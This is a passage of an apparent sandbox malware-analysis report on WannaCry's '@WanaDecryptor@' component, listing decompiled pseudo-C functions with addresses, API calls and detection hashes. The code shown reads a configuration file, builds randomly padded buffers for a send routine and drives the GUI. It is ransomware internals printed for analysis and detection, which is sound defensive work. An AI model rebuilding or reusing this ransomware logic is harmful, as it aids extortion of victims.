								_t52 = fgets( &_v2252, 0x3e7, _t103);
								_t113 = _t113 + 0x18;
								__eflags = _t52;
								if(_t52 == 0) {
									break;
								}
								asm("repne scasb");
								_t75 = 0xbadbac;
								__eflags = 0xbadbac;
								if(0xbadbac != 0) {
									while(1) {
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										L9:
										asm("repne scasb");
										_t78 =  !(_t78 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
											goto L10;
										}
										asm("repne scasb");
										__eflags =  !(_t78 | 0xffffffff) != 1;
										if( !(_t78 | 0xffffffff) != 1) {
											_t58 = E00402650( &_v1252,  &_v2252);
											__eflags = _t58;
											if(_t58 != 0) {
												_t29 =  &_v2256;
												 *_t29 = _v2256 + 1;
												__eflags =  *_t29;
											}
										}
										goto L14;
										L10:
										asm("repne scasb");
										_t75 =  !(_t78 | 0xffffffff) - 1;
										 *((char*)(_t113 + _t75 + 0x13)) = 0;
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										goto L9;
									}
								}
								L14:
								__eflags =  *(_t103 + 0xc) & 0x00000010;
								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
									continue;
								}
								break;
							}
						}
						fclose(_t103);
						__eflags = _v2256;
						_t36 = _v2256 > 0;
						__eflags = _t36;
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						 *[fs:0x0] = _v12;
						return 0 | _t36;
					} else {
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						__eflags = 0;
						 *[fs:0x0] = _v12;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}


















                                  0x00403af6
                                  0x00403af8
                                  0x00403afd
                                  0x00403afe
                                  0x00403b1d
                                  0x00403b21
                                  0x00403b26
                                  0x00403b48
                                  0x00403b5b
                                  0x00403b62
                                  0x00403b67
                                  0x00403b69
                                  0x00403b9b
                                  0x00403b9e
                                  0x00403ba2
                                  0x00403ba4
                                  0x00403bb2
                                  0x00403bbd
                                  0x00403bc1
                                  0x00403bc3
                                  0x00403bc5
                                  0x00403bd1
                                  0x00403bd3
                                  0x00403bd6
                                  0x00403bd8
                                  0x00000000
                                  0x00000000
                                  0x00403be7
                                  0x00403beb
                                  0x00403beb
                                  0x00403bec
                                  0x00403bee
                                  0x00403bf7
                                  0x00403bfb
                                  0x00403bfc
                                  0x00403c01
                                  0x00000000
                                  0x00000000
                                  0x00403c03
                                  0x00403c0c
                                  0x00403c10
                                  0x00403c11
                                  0x00403c16
                                  0x00000000
                                  0x00000000
                                  0x00403c35
                                  0x00403c39
                                  0x00403c3a
                                  0x00403c48
                                  0x00403c4d
                                  0x00403c4f
                                  0x00403c51
                                  0x00403c51
                                  0x00403c51
                                  0x00403c51
                                  0x00403c4f
                                  0x00000000
                                  0x00403c18
                                  0x00403c21
                                  0x00403c25
                                  0x00403c26
                                  0x00403bf7
                                  0x00403bfb
                                  0x00403bfc
                                  0x00403c01
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403c01
                                  0x00403bee
                                  0x00403c55
                                  0x00403c55
                                  0x00403c59
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403c59
                                  0x00403c60
                                  0x00403c62
                                  0x00403c71
                                  0x00403c73
                                  0x00403c73
                                  0x00403c7f
                                  0x00403c8a
                                  0x00403c9a
                                  0x00403ca7
                                  0x00403b6b
                                  0x00403b72
                                  0x00403b7d
                                  0x00403b83
                                  0x00403b8d
                                  0x00403b9a
                                  0x00403b9a
                                  0x00403b28
                                  0x00403b33
                                  0x00403b40
                                  0x00403b40

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fopen
                                  • String ID: f.wnry
                                  • API String ID: 1432627528-2448388194
                                  • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                  • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D150 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
				char _v500;
				intOrPtr _v508;
				char _v520;
				char _v521;
				char _v528;
				char _v529;
				intOrPtr _v536;
				signed int _t42;
				short _t46;
				signed int _t48;
				int _t62;
				intOrPtr* _t63;
				intOrPtr _t67;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t89;
				void* _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t99;

				_t89 = __edi;
				_t63 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t99 =  &_v508 + 8;
				_t42 = rand();
				asm("cdq");
				_t94 = 0;
				_t81 = _t42 % 0xc8 + 0x1f;
				_v508 = _t81;
				if(_t81 > 0) {
					do {
						_t62 = rand();
						_t81 = _v508;
						 *(_t99 + _t94 + 0x14) = _t62;
						_t94 = _t94 + 1;
					} while (_t94 < _t81);
				}
				_t95 = _a16;
				_t97 = _t99 + _t81 - 0xb;
				if(_t95 != 0) {
					_push(_t89);
					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
					_t99 = _t99 + 0xc;
					asm("movsw");
					asm("movsb");
					_t81 = _v508;
					_t95 = _a16;
				}
				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
				_t82 = _t81 + 1;
				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
				_t83 = _t82 + 1;
				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
				_v508 = _t83 + 1;
				_t46 = E00412B00(_t97, 0x1f);
				_t67 = _v508;
				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
				if(_t48 < 0) {
					L12:
					return _t48 | 0xffffffff;
				} else {
					E0040D5A0(_t63, _t97);
					_push( &_v528);
					_push( &_v520);
					_push( &_v521);
					_v528 = 0x1f4;
					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
						goto L12;
					} else {
						if(_t95 == 0) {
							L10:
							return 0;
						} else {
							_push(1);
							_push(_v536);
							_push( &_v528);
							_push(2);
							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
								goto L10;
							} else {
								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
							}
						}
					}
				}
			}
























                                  0x0040d150
                                  0x0040d159
                                  0x0040d15b
                                  0x0040d15d
                                  0x0040d163
                                  0x0040d168
                                  0x0040d16b
                                  0x0040d170
                                  0x0040d176
                                  0x0040d17a
                                  0x0040d17f
                                  0x0040d183
                                  0x0040d185
                                  0x0040d185
                                  0x0040d18a
                                  0x0040d18e
                                  0x0040d192
                                  0x0040d193
                                  0x0040d185
                                  0x0040d197
                                  0x0040d19e
                                  0x0040d1a4
                                  0x0040d1a6
                                  0x0040d1b7
                                  0x0040d1b7
                                  0x0040d1b9
                                  0x0040d1bb
                                  0x0040d1bc
                                  0x0040d1c0
                                  0x0040d1c7
                                  0x0040d1d6
                                  0x0040d1e1
                                  0x0040d1e5
                                  0x0040d1e9
                                  0x0040d1ea
                                  0x0040d1ef
                                  0x0040d1f3
                                  0x0040d1f8
                                  0x0040d201
                                  0x0040d215
                                  0x0040d21a
                                  0x0040d297
                                  0x0040d2a1
                                  0x0040d21c
                                  0x0040d21f
                                  0x0040d22a
                                  0x0040d233
                                  0x0040d234
                                  0x0040d237
                                  0x0040d244
                                  0x0040d292
                                  0x00000000
                                  0x0040d24d
                                  0x0040d24f
                                  0x0040d282
                                  0x0040d28b
                                  0x0040d251
                                  0x0040d257
                                  0x0040d25d
                                  0x0040d25e
                                  0x0040d25f
                                  0x0040d268
                                  0x00000000
                                  0x0040d26a
                                  0x0040d27d
                                  0x0040d27d
                                  0x0040d268
                                  0x0040d24f
                                  0x0040d244

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                  • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406A00 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				void* _t15;
				signed int _t23;
				intOrPtr* _t33;
				void* _t34;

				_t23 = _a12;
				_t33 = _a4;
				_push(_t23);
				_push(_a8);
				_t34 = __ecx;
				_push(_t33);
				L00412D6A();
				if(_t23 > 6) {
					L12:
					return _t15;
				} else {
					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
						case 0:
							_push( *((intOrPtr*)(__ecx + 0x824)));
							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
							L00412D64();
							if(_t17 == 0x402) {
								L6:
								_push(0xe0e0);
								 *((intOrPtr*)( *_t33 + 0x38))();
							} else {
								L00412D64();
								if(_t17 == 0x3fe) {
									goto L6;
								} else {
									L00412D64();
									if(_t17 == 0x3fb) {
										goto L6;
									} else {
										_push(0xffffff);
										 *((intOrPtr*)( *_t33 + 0x38))();
									}
								}
							}
							_t35 =  *((intOrPtr*)(_t34 + 0x828));
							if(_t35 != 0) {
								goto L11;
							}
							return 0;
							goto L13;
						case 1:
							goto L12;
						case 2:
							_push( *((intOrPtr*)(__esi + 0x824)));
							__ecx = __edi;
							 *((intOrPtr*)( *__edi + 0x34))();
							if(__esi != 0) {
								L11:
								return  *((intOrPtr*)(_t35 + 4));
							}
							return 0;
							goto L13;
					}
				}
				L13:
			}







                                  0x00406a01
                                  0x00406a0c
                                  0x00406a10
                                  0x00406a11
                                  0x00406a12
                                  0x00406a14
                                  0x00406a15
                                  0x00406a1d
                                  0x00406ab7
                                  0x00406ab7
                                  0x00406a23
                                  0x00406a23
                                  0x00000000
                                  0x00406a32
                                  0x00406a35
                                  0x00406a3a
                                  0x00406a44
                                  0x00406a70
                                  0x00406a72
                                  0x00406a79
                                  0x00406a46
                                  0x00406a48
                                  0x00406a52
                                  0x00000000
                                  0x00406a54
                                  0x00406a56
                                  0x00406a60
                                  0x00000000
                                  0x00406a62
                                  0x00406a64
                                  0x00406a6b
                                  0x00406a6b
                                  0x00406a60
                                  0x00406a52
                                  0x00406a7c
                                  0x00406a84
                                  0x00000000
                                  0x00000000
                                  0x00406a8c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406a97
                                  0x00406a98
                                  0x00406a9a
                                  0x00406aa5
                                  0x00406ab0
                                  0x00000000
                                  0x00406ab0
                                  0x00406aad
                                  0x00000000
                                  0x00000000
                                  0x00406a23
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3089$#4476
                                  • String ID:
                                  • API String ID: 2870283385-0
                                  • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                  • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D0A0 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
				char _v500;
				signed int _t22;
				signed int _t27;
				intOrPtr* _t32;
				void* _t40;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;

				_t32 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t49 =  &_v500 + 8;
				_t22 = rand();
				asm("cdq");
				_t40 = 0;
				_t43 = _t22 % 0xc8 + 0x1f;
				if(_t43 <= 0) {
					L2:
					_t41 = _t49 + _t43 - 0x13;
					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
					_t44 = _t43 + 1;
					 *((char*)(_t49 + _t44 + 0x14)) = 0;
					_t45 = _t44 + 1;
					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
					_t46 = _t45 + 1;
					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
					if(_t27 >= 0) {
						E0040D5A0(_t32, _t41);
						return 0;
					} else {
						return _t27 | 0xffffffff;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					 *((char*)(_t49 + _t40 + 0xc)) = rand();
					_t40 = _t40 + 1;
				} while (_t40 < _t43);
				goto L2;
			}













                                  0x0040d0a9
                                  0x0040d0ab
                                  0x0040d0ad
                                  0x0040d0b3
                                  0x0040d0b8
                                  0x0040d0bb
                                  0x0040d0c0
                                  0x0040d0c6
                                  0x0040d0cc
                                  0x0040d0d1
                                  0x0040d0e1
                                  0x0040d0ef
                                  0x0040d0f3
                                  0x0040d0f7
                                  0x0040d0fb
                                  0x0040d100
                                  0x0040d101
                                  0x0040d105
                                  0x0040d110
                                  0x0040d124
                                  0x0040d129
                                  0x0040d13d
                                  0x0040d14d
                                  0x0040d12d
                                  0x0040d137
                                  0x0040d137
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d0d3
                                  0x0040d0d3
                                  0x0040d0d8
                                  0x0040d0dc
                                  0x0040d0dd
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                  • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405180 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00405180(void* __ecx, intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t19;
				void* _t26;

				_t19 = _a4;
				_t26 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x44));
				__imp___mbscmp(_t10, _t19);
				if(_t10 == 0) {
					return _t10;
				} else {
					_push(_t19);
					L00412DA0();
					 *((char*)(__ecx + 0x48)) = 1;
					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
						E00405800(__ecx, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
						E00405820(_t26, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
						return InvalidateRect( *(_t26 + 0x20), 0, 1);
					}
					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
				}
			}






                                  0x00405181
                                  0x00405186
                                  0x0040518a
                                  0x00405191
                                  0x0040519c
                                  0x004051fb
                                  0x0040519e
                                  0x0040519e
                                  0x004051a1
                                  0x004051a9
                                  0x004051af
                                  0x004051b5
                                  0x004051b5
                                  0x004051bf
                                  0x004051c5
                                  0x004051c5
                                  0x004051cf
                                  0x00000000
                                  0x004051f2
                                  0x004051e7
                                  0x004051e7

                                  APIs
                                  • _mbscmp.MSVCRT ref: 00405191
                                  • #860.MFC42(?), ref: 004051A1
                                  • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                  • String ID:
                                  • API String ID: 497622568-0
                                  • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                  • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404430 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00404430(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				struct HICON__* _t16;
				struct HICON__* _t17;
				intOrPtr _t26;

				_t26 = __ecx;
				_t13 =  *((intOrPtr*)(__ecx + 0x59));
				if(_t13 != 0) {
					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
						E00404530(__ecx);
					}
					if(E004045E0(_t26,  &_a8) == 0) {
						_t16 =  *(_t26 + 0x60);
					} else {
						_t16 =  *(_t26 + 0x5c);
					}
					_t17 = SetCursor(_t16);
					L00412CBC();
					return _t17;
				} else {
					_v16 = 0x10;
					if(__ecx != 0) {
						_t13 =  *((intOrPtr*)(__ecx + 0x20));
						_v8 = _t13;
					} else {
						_v8 = __ecx;
					}
					_v12 = 2;
					__imp___TrackMouseEvent( &_v16);
					 *((char*)(_t26 + 0x59)) = 1;
					L00412CBC();
					return _t13;
				}
			}










                                  0x00404434
                                  0x00404436
                                  0x0040443b
                                  0x00404480
                                  0x00404484
                                  0x00404484
                                  0x00404497
                                  0x0040449e
                                  0x00404499
                                  0x00404499
                                  0x00404499
                                  0x004044a2
                                  0x004044aa
                                  0x004044b3
                                  0x0040443d
                                  0x0040443f
                                  0x00404447
                                  0x0040444f
                                  0x00404452
                                  0x00404449
                                  0x00404449
                                  0x00404449
                                  0x0040445a
                                  0x00404463
                                  0x0040446b
                                  0x0040446f
                                  0x00404478
                                  0x00404478

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$CursorEventMouseTrack
                                  • String ID:
                                  • API String ID: 2186836335-0
                                  • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                  • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404CF0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00404CF0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t13;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t27;

				_push(0xffffffff);
				_push(E0041384E);
				_t13 =  *[fs:0x0];
				_push(_t13);
				 *[fs:0x0] = _t27;
				_v20 = __ecx;
				_v4 = 0;
				_t21 = __ecx + 0x70;
				_v16 = _t21;
				 *_t21 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t21 = 0x415bec;
				_t22 = __ecx + 0x64;
				_v16 = _t22;
				 *_t22 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t22 = 0x415bec;
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t13;
			}











                                  0x00404cf0
                                  0x00404cf2
                                  0x00404cf7
                                  0x00404cfd
                                  0x00404cfe
                                  0x00404d0c
                                  0x00404d10
                                  0x00404d18
                                  0x00404d1b
                                  0x00404d1f
                                  0x00404d27
                                  0x00404d2c
                                  0x00404d31
                                  0x00404d37
                                  0x00404d3a
                                  0x00404d3e
                                  0x00404d46
                                  0x00404d4b
                                  0x00404d53
                                  0x00404d59
                                  0x00404d5e
                                  0x00404d65
                                  0x00404d6d
                                  0x00404d78
                                  0x00404d82

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                  • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                  • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#641#800
                                  • String ID:
                                  • API String ID: 2580907805-0
                                  • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                  • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404170 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00404170(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t12;
				intOrPtr* _t20;
				intOrPtr _t25;

				_push(0xffffffff);
				_push(E00413776);
				_t12 =  *[fs:0x0];
				_push(_t12);
				 *[fs:0x0] = _t25;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				_v4 = 0;
				_t20 = __ecx + 0x48;
				_v16 = _t20;
				 *_t20 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t20 = 0x415bec;
				_v4 = 1;
				L00412CC2();
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412D94();
				 *[fs:0x0] = _v12;
				return _t12;
			}










                                  0x00404170
                                  0x00404172
                                  0x00404177
                                  0x0040417d
                                  0x0040417e
                                  0x0040418c
                                  0x00404190
                                  0x00404196
                                  0x0040419e
                                  0x004041a1
                                  0x004041a5
                                  0x004041ad
                                  0x004041b2
                                  0x004041ba
                                  0x004041c0
                                  0x004041c5
                                  0x004041cd
                                  0x004041d2
                                  0x004041d9
                                  0x004041e1
                                  0x004041ec
                                  0x004041f6

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
